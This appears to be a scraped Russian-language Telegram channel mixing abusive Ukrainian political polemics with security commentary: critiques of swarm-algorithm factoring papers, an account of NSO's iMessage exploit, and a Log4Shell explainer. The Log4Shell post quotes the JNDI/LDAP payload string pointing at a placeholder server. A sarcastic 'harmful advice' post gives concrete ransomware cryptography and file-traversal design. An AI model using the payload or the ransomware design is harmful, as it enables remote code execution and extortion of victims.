Как может быть президентом страны человек, который не в состоянии произнести хотя бы одно предложение так, чтобы слушателю не приходила на ум классификация болезней МКБ-10?
Увидимся первого декабря. Переворот - так переворот
https://sokyra.space?p=tosscointosean
https://sokyra.space?p=tosscointosean
Shvets в очередной раз напоминает о том, что миром правит не тайная ложа, а явная лажа https://bit.ly/3nXsQ6o А мне сразу вспомнились все виденные мной "заговоры" и "хитрые планы", которых я к, своему несчастью, видел предостаточно. Некоторые, я думаю, представляют все это так:
... ночь, не гаснет в Кремле то самое окно, раздается тихий стук в дверь, в просторный кабинет укрытый густой тенью, входит офицер с решительным и немного уставшим лицом, и говорит: "Товарищ Президент Путин, товарищ Лапоть сообщает о том, что план "Золотой Дождь" вошел в финальную фазу. Агент Федос, опираясь на широкую поддержку масс и безусловную любовь украинцев к полиции, готов начать триумфальный поход на Киев. Рыжий везет миллиард в опломбированном вагоне". Путин одобрительно кивает, улыбается, откладывает папку особой важности с Хитрым Планом Путина™ и говорит: "Разрешаю. Действуйте". Играет тревожная патриотическая музыка, после берущих за душу балалаечных переливов, появляются титры: "Directed by Robert B Weide"
В любой стране фрики всех мастей, от патентованных сумасшедших и сбитых летчиков до условно вменяемых авантюристов, осаждают действующую власть с планами по немедленному покорению космоса и полной реорганизации рабкрина. Секретари очень важных особ их иногда даже читают, в основном по пятницам, когда можно отпустить узел галстука и немного похихикать за пивом. Есть целые институты, которые готовят эту продукцию на промышленной основе. Такие традиции, не мы их учредили - не нам менять. И так происходит до того момента, пока в плане не возникнет необходимость, и все тут же превращается в горящий бордель.
Вот вам пример c Администрацией президента РФ, "Офицерским Корпусом" и двумя миллионами на подготовку боевиков https://bit.ly/32sohsn Иногда планы доходят до адресата, либо в условиях чрезвычайных, либо благодаря личному упорству заговорщиков, как это было в случае с Усовским и польскими радикалами https://bit.ly/32JbCSh Спецслужбы, естественно, за всем этим присматривают немного искоса и неодобрительно и складывают в свои собственные папки. Не могут не складывать - такая работа, да, и пятницу тоже никто не отменял.
В отличии от заговорщиков, политические партии действуют совершенно иначе. Демократична Сокира и Рух Опору Капітуляції 21 ноября вывели людей на мирную акцию протеста, и поставили ультиматум - увольнение Ермака или через десять дней акция станет бессрочной https://bit.ly/3ruMIjF И кому-то на Банковой стало настолько не по себе, что за два дня до этого, какая-то организация, которая начинается на "С" и заканчивается на "У" устроила провокацию с фальшивым заявлением о том, что якобы Д7 и НК собираются с оружием в руках бороться за импичмент на украино-белорусской границе. Не спрашивайте меня почему. https://bit.ly/3HZfXko
А уже двадцать шестого числа, главнокомандующий Зеленский решил с боями прорываться сквозь медийную осаду, подгрызающую остатки рейтинга и заявил, что на первое число (то есть именно тогда, когда истекает ультиматум Д7 и РОК) готовится "переворот" с участием Ахметова и миллиарда долларов (понадобится контейнер, таких денег в кеше не бывает просто). В тот же день, журналист Christopher Miller узнает подробности о "перевороте" https://bit.ly/3E3e3fW, в котором якобы участвуют бывшие менты. Часть из них (по их словам) о своем участии - ни сном, ни духом.
Мог существовать подобный "план"? Легко! То что его достоверность и осуществимость сравнимы с высадкой монгольской конницы на Луне никого не беспокоит. Работа кипит. Представьте банковую: в воспаленной шаурме гаранта, которая заменяет ему мозг зверем в клетке мечется страх. Оно и говорит - найдите хоть что-нибудь, на олигархов злобных на сокиру эту непонятную. Они и ищут. С Медвечуком тоже так было. На уши всех поставили до внешней разведки включительно. Президент он или не президент, в конце-то концов? И тут, я предполагаю, дошли руки до "пятничной папки". И понеслась! Байден уже беспокоится.
Думаю нам еще дадут послушать "звуковую информацию" под тревожную музыку, но вы не обращайте внимание. Первого декабря. Банковая. Ермак должен уйти.
... ночь, не гаснет в Кремле то самое окно, раздается тихий стук в дверь, в просторный кабинет укрытый густой тенью, входит офицер с решительным и немного уставшим лицом, и говорит: "Товарищ Президент Путин, товарищ Лапоть сообщает о том, что план "Золотой Дождь" вошел в финальную фазу. Агент Федос, опираясь на широкую поддержку масс и безусловную любовь украинцев к полиции, готов начать триумфальный поход на Киев. Рыжий везет миллиард в опломбированном вагоне". Путин одобрительно кивает, улыбается, откладывает папку особой важности с Хитрым Планом Путина™ и говорит: "Разрешаю. Действуйте". Играет тревожная патриотическая музыка, после берущих за душу балалаечных переливов, появляются титры: "Directed by Robert B Weide"
В любой стране фрики всех мастей, от патентованных сумасшедших и сбитых летчиков до условно вменяемых авантюристов, осаждают действующую власть с планами по немедленному покорению космоса и полной реорганизации рабкрина. Секретари очень важных особ их иногда даже читают, в основном по пятницам, когда можно отпустить узел галстука и немного похихикать за пивом. Есть целые институты, которые готовят эту продукцию на промышленной основе. Такие традиции, не мы их учредили - не нам менять. И так происходит до того момента, пока в плане не возникнет необходимость, и все тут же превращается в горящий бордель.
Вот вам пример c Администрацией президента РФ, "Офицерским Корпусом" и двумя миллионами на подготовку боевиков https://bit.ly/32sohsn Иногда планы доходят до адресата, либо в условиях чрезвычайных, либо благодаря личному упорству заговорщиков, как это было в случае с Усовским и польскими радикалами https://bit.ly/32JbCSh Спецслужбы, естественно, за всем этим присматривают немного искоса и неодобрительно и складывают в свои собственные папки. Не могут не складывать - такая работа, да, и пятницу тоже никто не отменял.
В отличии от заговорщиков, политические партии действуют совершенно иначе. Демократична Сокира и Рух Опору Капітуляції 21 ноября вывели людей на мирную акцию протеста, и поставили ультиматум - увольнение Ермака или через десять дней акция станет бессрочной https://bit.ly/3ruMIjF И кому-то на Банковой стало настолько не по себе, что за два дня до этого, какая-то организация, которая начинается на "С" и заканчивается на "У" устроила провокацию с фальшивым заявлением о том, что якобы Д7 и НК собираются с оружием в руках бороться за импичмент на украино-белорусской границе. Не спрашивайте меня почему. https://bit.ly/3HZfXko
А уже двадцать шестого числа, главнокомандующий Зеленский решил с боями прорываться сквозь медийную осаду, подгрызающую остатки рейтинга и заявил, что на первое число (то есть именно тогда, когда истекает ультиматум Д7 и РОК) готовится "переворот" с участием Ахметова и миллиарда долларов (понадобится контейнер, таких денег в кеше не бывает просто). В тот же день, журналист Christopher Miller узнает подробности о "перевороте" https://bit.ly/3E3e3fW, в котором якобы участвуют бывшие менты. Часть из них (по их словам) о своем участии - ни сном, ни духом.
Мог существовать подобный "план"? Легко! То что его достоверность и осуществимость сравнимы с высадкой монгольской конницы на Луне никого не беспокоит. Работа кипит. Представьте банковую: в воспаленной шаурме гаранта, которая заменяет ему мозг зверем в клетке мечется страх. Оно и говорит - найдите хоть что-нибудь, на олигархов злобных на сокиру эту непонятную. Они и ищут. С Медвечуком тоже так было. На уши всех поставили до внешней разведки включительно. Президент он или не президент, в конце-то концов? И тут, я предполагаю, дошли руки до "пятничной папки". И понеслась! Байден уже беспокоится.
Думаю нам еще дадут послушать "звуковую информацию" под тревожную музыку, но вы не обращайте внимание. Первого декабря. Банковая. Ермак должен уйти.
👍1
Несколько дней назад нечто, избранное президентом Украины, разговаривало с голосами в своей шаурме. В то числе, ему задали вопрос про онлайн-выборы. У Володимир Александровича, как всегда, майонез державной мысли перемешался с влажным кетчупом фантазий, и он смешал в кучу перепись и выборы. Посипака величайшего клоуна совреенности Федоров, пояснил, что речь пока идет не о выборах, а о переписи. Совместно с Apple и Google. Хочу спросить, а с чего вы взяли, что участие бигтека вам поможет? Придурки, у вас уровень доверия к правительству 10-15%. Какая перепись? В Германии перепись не могут провести с 1987 года. Двадцатый век для немцев выдался довольно сложный. Мне все равно с чем вы пришлете переписчика - с блокнотом или планшетом. Почему? Потому, что нахуй пошли, вот почему. Не хочу. Что касается наевыборов, то они от этой идеи не хотят отказываться ни в какую. По мнению зеленого слизня "это круто". Так вот. Когда на выборах нет наблюдателей это совсем не "круто". Это нашего нанопарта кто-то обманул. Круто, это когда все (особенно проигравшие) верят в то, что выборы прошли честно. И это подтверждается наблюдателями и аудитами. В Украине онлайн-выборы закончатся немедленным крахом государственности.
👍2
Всю неделю Зеленский придумывает бредни о мирной акции Демократична Сокира и Рух Опору Капітуляції - "перевороты", "миллиарды Ахметова", "дестабилизация", и все это - ложь. СБУ расследует "насильницьку зміну чи повалення конституційного ладу", полиция уже парализовала движение в центре Киева. Зеленский боится. Так уж сложилось, что конституционный порядок подрывает "гарант конституции"
Сегодня. 1 декабря. 19:00 Майдан Незалежності
Сегодня. 1 декабря. 19:00 Майдан Незалежності
Периодически сталкиваюсь с рансомварью, и не могу без зубной боли смотреть на происходящее. Вредные советы. Ransomrants
Для начала, нужно забыть про RSA и про отстук на сервер. Не смотря на кажущуюся простоту, правильно реализовать длинную арифметику, генерацию ключей и все-такое, могут чуть менее, чем все. Потому Curve25519 и ECDH. В билд зашивается публичный ключ кампании. После генерации общего секрета, секретный ключ системы уничтожается. Полученный ключ пропустить через хеш.
Чтобы не накосячить с дополнением файлов - потоковый шифр (AES-CTR или ChaCha20). В случае с AES должно быть две версии - софтверная и с поддержкой AESNI. Для ChaCha тоже есть быстрые векторизованные версии. Нет, блядь, не со stackoverflow. Не нужно там ничего менять.
Один хер, вы не понимаете, что можно менять, а что нельзя, и проверить, что все равботает правильно, после внесения изменений не получится. KAT-тесты. Дальше. Шифры сделаны так, что даже зная открытый и зашифрованный текст, не получится восстановить ключ (confussion по Шеннону), и это значит, что одного ключа достаточно на всю систему, отдельные ключи для файлов не нужны.
Зато нужны IV/Nonce. Так как потоковый шифр - сложение текста и гаммы, то M + K + K = M. Вектора инициализации даже не обязательно должны быть случайными, достаточно, чтобы они были уникальными для каждого файла.
Случайные числа для генерации ключей брать только из /dev/urandom и не забыть проверить, что вернул open. Для чтения каталогов под Windows есть Master File Table, под юниксами getdents (с буфером 32к), все остальное вам все равно не по зубам. Чтение-запись файлов - блоками по 128к.
Не пытайтесь обфусцировать шифрование. Вы что думаете, что это остановит реверсера или, что крупная компания просто возьмет и запустит ваш тестовый расшифровщик, не посмотрев, что у него внутри? No way. Не тратьте время.
На этом собственно все. Когда вас посадят в федеральную тюрьму, то не забудьте прислать открытку. За хорошее поведение вам дадут доступ к email, вот такой:
Для начала, нужно забыть про RSA и про отстук на сервер. Не смотря на кажущуюся простоту, правильно реализовать длинную арифметику, генерацию ключей и все-такое, могут чуть менее, чем все. Потому Curve25519 и ECDH. В билд зашивается публичный ключ кампании. После генерации общего секрета, секретный ключ системы уничтожается. Полученный ключ пропустить через хеш.
Чтобы не накосячить с дополнением файлов - потоковый шифр (AES-CTR или ChaCha20). В случае с AES должно быть две версии - софтверная и с поддержкой AESNI. Для ChaCha тоже есть быстрые векторизованные версии. Нет, блядь, не со stackoverflow. Не нужно там ничего менять.
Один хер, вы не понимаете, что можно менять, а что нельзя, и проверить, что все равботает правильно, после внесения изменений не получится. KAT-тесты. Дальше. Шифры сделаны так, что даже зная открытый и зашифрованный текст, не получится восстановить ключ (confussion по Шеннону), и это значит, что одного ключа достаточно на всю систему, отдельные ключи для файлов не нужны.
Зато нужны IV/Nonce. Так как потоковый шифр - сложение текста и гаммы, то M + K + K = M. Вектора инициализации даже не обязательно должны быть случайными, достаточно, чтобы они были уникальными для каждого файла.
Случайные числа для генерации ключей брать только из /dev/urandom и не забыть проверить, что вернул open. Для чтения каталогов под Windows есть Master File Table, под юниксами getdents (с буфером 32к), все остальное вам все равно не по зубам. Чтение-запись файлов - блоками по 128к.
Не пытайтесь обфусцировать шифрование. Вы что думаете, что это остановит реверсера или, что крупная компания просто возьмет и запустит ваш тестовый расшифровщик, не посмотрев, что у него внутри? No way. Не тратьте время.
На этом собственно все. Когда вас посадят в федеральную тюрьму, то не забудьте прислать открытку. За хорошее поведение вам дадут доступ к email, вот такой:
👍1
Рилити Виннер, в прошлом контрактор АНБ, после четырех лет в тюрьме за разглашение секретного документа, начала давать интервью, и это, пожалуй, одна из самых идиотских утечек в истории. Сразу после школы Рилити служила переводчиком в ВВС США - фарси, дари и пашто, именно на основе этих данных наносились удары дронами и у Рилити есть медаль "шестьсот врагов убитых в бою".
Веган, зоо- и эко-защитница, таким образом Виннер "помогала людям Афганистана". После почетной отставки из ВВС она попыталась поработать на ниве активизма, но в результате ей пришлось вернуться на работу в АНБ. Интересно, что дроны и рзвед. данные, на основе которых наносились удары не привлекли её внимания (процесс принятия решений по дронам сольет Дениел Хейл)
И уже через несколько месяцев, Виннер прямо с рабочего места (!) отослала отчет агентства о спир-фишинговых атаках РФ на избирательные комиссии в The Intercept. Чтобы "США не стали Соединенными Штатами Российской Федерации". Редакция не придумала ничего лучше, чем показать распечатанный документ АНБ, чтобы проверить его подлинность.
Конец был немного предсказуем. Желтые точки на документе - это MIC (Machine Identification Code), документ был распечатан на принтере "модели 54, серийный номер 29535218, 9 мая 2017 в 6:20 утра.
Веган, зоо- и эко-защитница, таким образом Виннер "помогала людям Афганистана". После почетной отставки из ВВС она попыталась поработать на ниве активизма, но в результате ей пришлось вернуться на работу в АНБ. Интересно, что дроны и рзвед. данные, на основе которых наносились удары не привлекли её внимания (процесс принятия решений по дронам сольет Дениел Хейл)
И уже через несколько месяцев, Виннер прямо с рабочего места (!) отослала отчет агентства о спир-фишинговых атаках РФ на избирательные комиссии в The Intercept. Чтобы "США не стали Соединенными Штатами Российской Федерации". Редакция не придумала ничего лучше, чем показать распечатанный документ АНБ, чтобы проверить его подлинность.
Конец был немного предсказуем. Желтые точки на документе - это MIC (Machine Identification Code), документ был распечатан на принтере "модели 54, серийный номер 29535218, 9 мая 2017 в 6:20 утра.
👍1
Чтобы там ни говорили злопыхатели из госспецсвязи, а я очень люблю отечественную науку. Во-первых, за то, что она есть. Во-вторых, за неомрачаемый мыслью полет фантазии. В конце ноября прошла научно-практическая конференция "информационно-телекоммуникационные системы и технологии и кибербезопасность. новые вызовы, новые задания". И даже опубликованы тезисы.
Мое внимание сразу привлекла статья кандидата физико-математических наук и немного доцента Оксаны Кубайчук. О генетико-пчелином (и генетико-муравьином) подходе к разложению чисел на множители. Те кто начал хихикать и кричать "киньте цього доцента в вулик", еще рано, крикните потом. Есть такие алгоритмы, и пчелиные, и муравьиные, роевые, генетические - задачи на оптимизацию.
Предположим, что нужно построить оптимальный маршрут, чтобы объехать по кругу все ебеня. Можно начать перебирать все возможные маршруты один за другим и запоминать те, что получше, но от этого можно быстро охуеть, даже на пару с суперкомпьютером.
Потому строим пачку случайных маршрутов, худшую половину выкидываем, а из оставшихся собираем еще столько же, меняя их случайным образом и объединяя куски между собой. Суть в том, что если входные параметры изменятся чуть-чуть, то и результат поменяется не слишком сильно, а если и сильно, то выкинем брак и начнем заново. А то что остается становится лучше с каждой попыткой. Есть и другие подходы кроме ГА, но можно и так.
Задача RSA (то есть разложение бипростых на множители) хотя и обитает в том же классе NP (но не NP-hard как коммивояжер, а NP-intermediate, но это не точно), но с оптимизацией не имеет ничего общего. Нужно перебрать √N чисел и найти делитель. Задача все-или-ничего. Либо делится без остатка, либо нет.
Давайте попробуем разложить на множители число 851. Сгенерируем пары (2, 31), (5, 17), (3, 11), (29, 13), и что-то не сходится. Все случайные пары одинаково бесполезны, среди них нет значений "получше" и "похуже". Или разделим на отрезки как предлагает автор (1, 9), (10, 19), (20, 30). Какой из них лучше, какой хуже? Никакой. Они ничем не отличаются. Нет целевой функции, потому отбор невозможен. И никакие пчелы и муравьи тут не помогут. Роевой интеллект тоже.
Но к примеру, можно представить число 851, как 900 - 49 и вспомнить, что a^2 - b^2 = (a + b)(a - b), и 30^2 - 7^2 = (30 + 7)*(30 - 7) = 851, и ответ 23 и 37. Пьер Ферма придумал этот фокус триста пятьдесят лет назад. Отряхнув лошадиный навоз с сапог, при свече писал. Эйлер мерз в Петербурге, от чего и умер. И зачем? Чтобы вы потом на него пчел и муравьев натравливали? С тех пор наука-кудесница не стояла на месте, и не только не остановилась на ρ-алгоритме Полларда (1975!), но и одарила нас ECM, QS и GNFS.
Дальше в сборнике еще пять статей о криптоанализе блочных шифров. Анекдот вспомнился. "Рыба живет в воде, шерсти у нее конечно нет, но вот если бы она у нее была, то в ней обязательно водились бы блохи…" Да, вы угадали, сперва пчелами, потом муравьями, а потом гибридным пчелино-муравьиным методом.
Там все еще хуже, чем с бипростыми, потому что функции в шифровании не только, мягко говоря, "немонотонные", а еще и сделанные так, чтобы изменения одного бита на входе меняли (в среднем) половину выхода. Весьма нелинейным способом.
Напомню, что конференция совместная Державна служба спеціального зв'язку та захисту інформації и ІСЗЗІ КПІ ім. Ігоря Сікорського, профильный институт и профильный рагуляйтер. Блокчейна еще не хватает с military-grade base64
Мое внимание сразу привлекла статья кандидата физико-математических наук и немного доцента Оксаны Кубайчук. О генетико-пчелином (и генетико-муравьином) подходе к разложению чисел на множители. Те кто начал хихикать и кричать "киньте цього доцента в вулик", еще рано, крикните потом. Есть такие алгоритмы, и пчелиные, и муравьиные, роевые, генетические - задачи на оптимизацию.
Предположим, что нужно построить оптимальный маршрут, чтобы объехать по кругу все ебеня. Можно начать перебирать все возможные маршруты один за другим и запоминать те, что получше, но от этого можно быстро охуеть, даже на пару с суперкомпьютером.
Потому строим пачку случайных маршрутов, худшую половину выкидываем, а из оставшихся собираем еще столько же, меняя их случайным образом и объединяя куски между собой. Суть в том, что если входные параметры изменятся чуть-чуть, то и результат поменяется не слишком сильно, а если и сильно, то выкинем брак и начнем заново. А то что остается становится лучше с каждой попыткой. Есть и другие подходы кроме ГА, но можно и так.
Задача RSA (то есть разложение бипростых на множители) хотя и обитает в том же классе NP (но не NP-hard как коммивояжер, а NP-intermediate, но это не точно), но с оптимизацией не имеет ничего общего. Нужно перебрать √N чисел и найти делитель. Задача все-или-ничего. Либо делится без остатка, либо нет.
Давайте попробуем разложить на множители число 851. Сгенерируем пары (2, 31), (5, 17), (3, 11), (29, 13), и что-то не сходится. Все случайные пары одинаково бесполезны, среди них нет значений "получше" и "похуже". Или разделим на отрезки как предлагает автор (1, 9), (10, 19), (20, 30). Какой из них лучше, какой хуже? Никакой. Они ничем не отличаются. Нет целевой функции, потому отбор невозможен. И никакие пчелы и муравьи тут не помогут. Роевой интеллект тоже.
Но к примеру, можно представить число 851, как 900 - 49 и вспомнить, что a^2 - b^2 = (a + b)(a - b), и 30^2 - 7^2 = (30 + 7)*(30 - 7) = 851, и ответ 23 и 37. Пьер Ферма придумал этот фокус триста пятьдесят лет назад. Отряхнув лошадиный навоз с сапог, при свече писал. Эйлер мерз в Петербурге, от чего и умер. И зачем? Чтобы вы потом на него пчел и муравьев натравливали? С тех пор наука-кудесница не стояла на месте, и не только не остановилась на ρ-алгоритме Полларда (1975!), но и одарила нас ECM, QS и GNFS.
Дальше в сборнике еще пять статей о криптоанализе блочных шифров. Анекдот вспомнился. "Рыба живет в воде, шерсти у нее конечно нет, но вот если бы она у нее была, то в ней обязательно водились бы блохи…" Да, вы угадали, сперва пчелами, потом муравьями, а потом гибридным пчелино-муравьиным методом.
Там все еще хуже, чем с бипростыми, потому что функции в шифровании не только, мягко говоря, "немонотонные", а еще и сделанные так, чтобы изменения одного бита на входе меняли (в среднем) половину выхода. Весьма нелинейным способом.
Напомню, что конференция совместная Державна служба спеціального зв'язку та захисту інформації и ІСЗЗІ КПІ ім. Ігоря Сікорського, профильный институт и профильный рагуляйтер. Блокчейна еще не хватает с military-grade base64
👍1
Пожалуй, это станет моей любимой историей про автоматизацию и реинжениринг процессов вобще и в Украине в частности. Началось все с того, что у меня оказались все ингредиенты будущего борща кроме буряков и капусты, так что пришлось идти за ними в магазин. Борщ я затеял варить не как все нормальные люди днем, а как писал Ерофеев: в "самое бессильное и позорное время в жизни моего народа". С тех пор Советский Союз проиграл холодную войну и развалился, в связи с чем магазины стали работать круглосуточно и там появился херес. Так что мне досталось два отличных буряка, замечательная капуста, и пока загружался доисторический линукс в весах у меня было время подумать, так что я добавил к овощам банку пива. И ее мне отказались пробивать на кассе, потому что вдруг я буду шуметь, хулиганить и грызть свои буряки прямо у входа, распугивая капустой добропорядочных граждан. Никакие суды фашистам из КМДА не указ, о чем я постоянно забываю. Я уже было расстроился, но мне подсказали, что тут есть еще одна касса специально для таких случаев, к которой уже целеустремленно шел седовласый господин с чекушкой водки. Как мудро устроена наша жизнь, - думал я, обгоняя конкурента за внимание невыспавшихся продавцов. И что у меня попросили на секретной кассе? Думаете деньги? Нет, не деньги, хотя деньги конечно тоже попросили, но потом, а сперва - сертификат. Потому что - это не касса, а "бар". Шах и мат тебе Шон без телефона, шах и мат. В магазин без сертификата можно, а в "бар" посреди магазина без сертификата никак нельзя. Не положено. Выручил меня джентельмен с водкой, гордо доставший бумажный аусвайс в файлике. Старая школа. Одного сертификата на двоих оказалось достаточно. Осталось еще приложение какое-нибудь придумать.
👍3
Эксплоиты, программки, которые превращают уязвимости в софте во что-нибудь полезное (для хакера, не для вас) - отдельный вид современного искусства. Не знаю с чем сравнить. Сборка кораблика в бутылке с помощью трехметровой линейки с завязанными глазами? Поездка на машине, от которой вы по ходу дела отломали тормоза, колесо, и пытаетесь ей управлять с помощью лома, резинки от трусов и набора цветных карандашей? Как-то так.
Гугл распотрошил экслоит израильской NSO https://bit.ly/3mabxOl и это замечательная конструкция. Люди посылают друг другу смешные анимированные гифки (хотел бы я рассказать какие гифки есть в нашем секретном партийном чате, но меня тут же забанят). iMessage хочет, чтобы они крутились вечно. Для этого в заголовке GIF нужно поправить флажок, и чтобы не портить файл iMessage делает его копию. Казалось бы, что могло пойти не так?
По ошибке вместо копирования вызывается рендеринг картинок. А он уже на расширения файлов не смотрит. И NSO под видом гифки подсовывает PDF. А внутри PDF-ки картинка JBIG2 - это такой доисторический формат графики для ксероксов. Чтобы файлы получались маленькими, то он режет картинку на кусочки, и если куски, например буква "а" достаточно похожи между собой, то он использует один глиф для всего, как типографскую литеру.
Из-за этого случались многие беды https://bit.ly/3scwDiQ Кодек мог к примеру подумать что цифра 6 достаточно похожа на цифру 8, и заменить ее везде на картинках, чтобы сэконосить место. Потому в формат добавили маски - разницу между "похожим" глифом и тем, что нужно воспроизвести. И эти исправления накладываются на глиф с помощью операций AND, OR, XOR и XNOR. То есть эта штука тьюринг-полная. Любое мыслимое вычисление можно провести с помощью этих операций.
Дальше NSO использовали целочисленное переполнение, чтобы выйти за границы буфера и эта часть напоминает бутылку и кораблик. В результате они получили два основных примитива чтение и запись в произвольные места памяти. Если бы они хотели взломать одну конкретную версию софта, то этого бы хватило, но они захотели все и сразу. Для этого нужно знать, что и куда записывать.
И из доисторического графического формата они собрали полноценный виртуальный микрокомпьютер из 70 000 вентилей (те самые маски).
Нужно еще раз все перечислить, чтобы оценить проделанную NSO работу. Вам приходит гифка, которая на самом деле пдфка, и ее по ошибке, не копируют, а пытаются прочитать, в ней доисторическая картинка в формате ксероксов, которая в результате целочисленного переполнения может писать в память, и внутри этой "картинки" семьдесят тысяч блоков логических операций, которые эмулируют небольшой компьютер, который уже находит то место в памяти, которое нужно пропатчить, чтобы убежать из песочницы.
NSO продавали эту изящную вещицу негодяям и убийцам, но то как она сделана!..
Гугл распотрошил экслоит израильской NSO https://bit.ly/3mabxOl и это замечательная конструкция. Люди посылают друг другу смешные анимированные гифки (хотел бы я рассказать какие гифки есть в нашем секретном партийном чате, но меня тут же забанят). iMessage хочет, чтобы они крутились вечно. Для этого в заголовке GIF нужно поправить флажок, и чтобы не портить файл iMessage делает его копию. Казалось бы, что могло пойти не так?
По ошибке вместо копирования вызывается рендеринг картинок. А он уже на расширения файлов не смотрит. И NSO под видом гифки подсовывает PDF. А внутри PDF-ки картинка JBIG2 - это такой доисторический формат графики для ксероксов. Чтобы файлы получались маленькими, то он режет картинку на кусочки, и если куски, например буква "а" достаточно похожи между собой, то он использует один глиф для всего, как типографскую литеру.
Из-за этого случались многие беды https://bit.ly/3scwDiQ Кодек мог к примеру подумать что цифра 6 достаточно похожа на цифру 8, и заменить ее везде на картинках, чтобы сэконосить место. Потому в формат добавили маски - разницу между "похожим" глифом и тем, что нужно воспроизвести. И эти исправления накладываются на глиф с помощью операций AND, OR, XOR и XNOR. То есть эта штука тьюринг-полная. Любое мыслимое вычисление можно провести с помощью этих операций.
Дальше NSO использовали целочисленное переполнение, чтобы выйти за границы буфера и эта часть напоминает бутылку и кораблик. В результате они получили два основных примитива чтение и запись в произвольные места памяти. Если бы они хотели взломать одну конкретную версию софта, то этого бы хватило, но они захотели все и сразу. Для этого нужно знать, что и куда записывать.
И из доисторического графического формата они собрали полноценный виртуальный микрокомпьютер из 70 000 вентилей (те самые маски).
Нужно еще раз все перечислить, чтобы оценить проделанную NSO работу. Вам приходит гифка, которая на самом деле пдфка, и ее по ошибке, не копируют, а пытаются прочитать, в ней доисторическая картинка в формате ксероксов, которая в результате целочисленного переполнения может писать в память, и внутри этой "картинки" семьдесят тысяч блоков логических операций, которые эмулируют небольшой компьютер, который уже находит то место в памяти, которое нужно пропатчить, чтобы убежать из песочницы.
NSO продавали эту изящную вещицу негодяям и убийцам, но то как она сделана!..
👍11
Раз уж речь зашла об эксплоитах, то сложно пропустить беспощадную техасскую резню бензопилой, которая прямо сейчас происходит в Интернете. Такого не было со времен shellshock и heartbleed. Линус Торвальдс как-то сказал, что если есть достаточно глаз, все баги выплывают. И это конечно не совсем так. Грустная правда заключается в том, что люди не умеют писать надежный софт, и если бы строители строили дома так, как программисты пишут код, то первый же залетный дятел полностью разрушил бы цивилизацию.
В этот раз ошибка нашлась в популярной open-source библиотеке Log4j. Программисты любят добавлять фичи, ентерпрайз хочет быть готовым ко всему, включая высадку инопланетян. Потому среди многочисленных макросов (которые сами по себе зло) в Log4j есть поддержка JNDI и LDAP (что само по себе тяжкое наследие, Lighweight (облегченный) DAP придумали после того как выяснилось, что оригинальный DAP - настолько чудовищный выкидыш квадратно-гнездовой мысли, что пользоваться им не могут даже его собственные создатели). Даже не буду пытаться объяснять что это и почему оно такое страшное.
Достаточно пихнуть строку "${jndi:ldap://yourserver/}" куда угодно. В адресную строку сайта, в название Wi-Fi, в любое место, которое может попасть в логи, и если логами занимается Log4j, то библиотека попытается раскрыть макрос, затем обратится к вашему LDAP-серверу, который должен связать имя со ссылкой, с этой ссылки можно отдать небольшую програмку, и удаленный сервер её исполнит. Просто возьмет ваш код и запустит его у себя. И сейчас все, в названии чего встречается "j" - прекрасная добыча для хакеров всех мастей и расцветок.
Авторов библиотеки заваливают тоннами ненависти и зря. Лучше дайте им денег. Они вам ничего не должны. Лицензия Apache - тоже лицензия, и её нужно читать. Хотели бесплатно? Получите.
Не смотря на то, что Github начал мочить копии эксплоита (до того как его купил Майкрософт такого безобразия не было), он разошелся весьма широко. Кстати, если вы пользуетесь публичным сканером Log4Shell, то вы помогаете китайцам собрать самый полный список уязвимых хостов, потому что он пользуется китайской DNS-ловушкой dnslog.cn. Я понимаю, что поднять логирующий DNS-сервер для элитных похекеров непосильная задача, но нельзя же так.
В этот раз ошибка нашлась в популярной open-source библиотеке Log4j. Программисты любят добавлять фичи, ентерпрайз хочет быть готовым ко всему, включая высадку инопланетян. Потому среди многочисленных макросов (которые сами по себе зло) в Log4j есть поддержка JNDI и LDAP (что само по себе тяжкое наследие, Lighweight (облегченный) DAP придумали после того как выяснилось, что оригинальный DAP - настолько чудовищный выкидыш квадратно-гнездовой мысли, что пользоваться им не могут даже его собственные создатели). Даже не буду пытаться объяснять что это и почему оно такое страшное.
Достаточно пихнуть строку "${jndi:ldap://yourserver/}" куда угодно. В адресную строку сайта, в название Wi-Fi, в любое место, которое может попасть в логи, и если логами занимается Log4j, то библиотека попытается раскрыть макрос, затем обратится к вашему LDAP-серверу, который должен связать имя со ссылкой, с этой ссылки можно отдать небольшую програмку, и удаленный сервер её исполнит. Просто возьмет ваш код и запустит его у себя. И сейчас все, в названии чего встречается "j" - прекрасная добыча для хакеров всех мастей и расцветок.
Авторов библиотеки заваливают тоннами ненависти и зря. Лучше дайте им денег. Они вам ничего не должны. Лицензия Apache - тоже лицензия, и её нужно читать. Хотели бесплатно? Получите.
Не смотря на то, что Github начал мочить копии эксплоита (до того как его купил Майкрософт такого безобразия не было), он разошелся весьма широко. Кстати, если вы пользуетесь публичным сканером Log4Shell, то вы помогаете китайцам собрать самый полный список уязвимых хостов, потому что он пользуется китайской DNS-ловушкой dnslog.cn. Я понимаю, что поднять логирующий DNS-сервер для элитных похекеров непосильная задача, но нельзя же так.
👍2
Проект "договора с NATO", который выдала правопреемница империи зла - фантастическая наглость. Завораживает своей отбитостью. Эдакая машина времени, на которой газоспасаемая пытается вернуться в 1989 год. Тогда у Союза еще был шанс обменять объединение Германии на внеблоковый статус, тем более, что не всем в Европе нравилась роль Америки в архитектуре европейской безопасности, подкрепленная ядерными ракетами. Как шутили в Германии, чем короче радиус, тем мертвее немцы.
Были тогда в Европе идеи отказаться от НАТО и построить что-нибудь из CSCE/OSCE. И этот поезд давно ушел. Уже к моменту подписания соглашения "два плюс четыре", мишка начал грызть балайку от голода и все рычаги влияния куда-то проебались. Хотелось бы мне, чтобы и в Украине, точно так же как в свое время в странах вышеградской тройки, а затем странах балтии, понимали, что вопрос членства в НАТО, это как раз вопрос о том, с какой стороны от рва с крокодилами мы окажемся. Где проходит граница вменяемости.
Были тогда в Европе идеи отказаться от НАТО и построить что-нибудь из CSCE/OSCE. И этот поезд давно ушел. Уже к моменту подписания соглашения "два плюс четыре", мишка начал грызть балайку от голода и все рычаги влияния куда-то проебались. Хотелось бы мне, чтобы и в Украине, точно так же как в свое время в странах вышеградской тройки, а затем странах балтии, понимали, что вопрос членства в НАТО, это как раз вопрос о том, с какой стороны от рва с крокодилами мы окажемся. Где проходит граница вменяемости.